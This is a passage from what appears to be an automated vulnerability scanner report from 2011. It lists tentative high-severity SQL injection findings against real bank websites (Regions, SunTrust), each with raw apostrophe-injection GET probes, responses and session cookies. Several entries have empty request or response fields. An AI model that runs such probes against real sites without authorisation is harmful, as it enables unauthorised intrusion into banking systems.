<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.145. https://www.regions.com/personal_banking/private_client.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/private_client.rf

Issue detail

Request 1

GET /personal_banking'/private_client.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/private_client.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 193

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fprivate_client.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/private_client.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.146. https://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/regionsnet.rf

Issue detail

Request 1

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/regionsnet.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 189

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fregionsnet.rf">here</a>.</h2>
</body></html>

Request 2

Response 2

1.147. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/regionsnet_bill_pay.rf

Issue detail

Request 1

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/regionsnet_bill_pay.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fregionsnet_bill_pay.rf">here</a>.</h2>
</body></html>

Request 2

Response 2

1.148. https://www.regions.com/personal_banking/retirement_planning.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/retirement_planning.rf

Issue detail

Request 1

GET /personal_banking'/retirement_planning.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/retirement_planning.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 198

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fretirement_planning.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/retirement_planning.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.149. https://www.regions.com/personal_banking/savings_cds.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/savings_cds.rf

Issue detail

Request 1

GET /personal_banking'/savings_cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/savings_cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 190

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2fsavings_cds.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/savings_cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.150. https://www.regions.com/personal_banking/trust_asset.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/personal_banking/trust_asset.rf

Issue detail

Request 1

GET /personal_banking'/trust_asset.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/trust_asset.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 190

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2ftrust_asset.rf">here</a>.</h2>
</body></html>

Request 2

GET /personal_banking''/trust_asset.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.151. https://www.regions.com/system/gateway.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.regions.com
Path:	/system/gateway.rf

Issue detail

Request 1

GET /system'/gateway.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/system'/gateway.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fsystem'%2fgateway.rf">here</a>.</h2>
</body></html>

Request 2

GET /system''/gateway.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.152. https://www.suntrust.com/portal/server.pt/community/checking_account_selector/440 [REST URL parameter 4] previous

Summary

Severity:	High
Confidence:	Tentative
Host:	https://www.suntrust.com
Path:	/portal/server.pt/community/checking_account_selector/440

Issue detail

Request 1

GET /portal/server.pt/community/checking_account_selector'/440 HTTP/1.1
Host: www.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_depth%3D1%7C1296742421127%3B%20v19%3DSTcom%257CPersonal%257CBanking%257CChecking%257CHome%7C1296742421129%3B; s_sess=%20s_cc%3Dtrue%3B%20v0%3DPS-PSRC-RT-BING-00033319%3B%20ttc%3D1296740621130%3B%20s_sq%3D%3B; BIGipServerwww.suntrust.com-pvic=1067582474.20480.0000; ASP.NET_SessionId=jqj5n545nhrvfvbrsxhkuq45;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:58:14 GMT
Server: Microsoft-IIS/6.0
Host-Name: P13F
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Language: en
Expires: 1296655094974
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1296741494974
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 91317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/">
<!-- This page uses the base page layo
...[SNIP]...
<td align="center" valign="top" width="80" colspan="1" class="alertErrorTitle">
...[SNIP]...

Request 2

GET /portal/server.pt/community/checking_account_selector''/440 HTTP/1.1
Host: www.suntrust.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_depth%3D1%7C1296742421127%3B%20v19%3DSTcom%257CPersonal%257CBanking%257CChecking%257CHome%7C1296742421129%3B; s_sess=%20s_cc%3Dtrue%3B%20v0%3DPS-PSRC-RT-BING-00033319%3B%20ttc%3D1296740621130%3B%20s_sq%3D%3B; BIGipServerwww.suntrust.com-pvic=1067582474.20480.0000; ASP.NET_SessionId=jqj5n545nhrvfvbrsxhkuq45;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:58:26 GMT
Server: Microsoft-IIS/6.0
Host-Name: P13F
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Language: en
Expires: 1296655106380
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1296741506380
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 90213

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/">
<!-- This page uses the base page layo
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:36:04 CST 2011.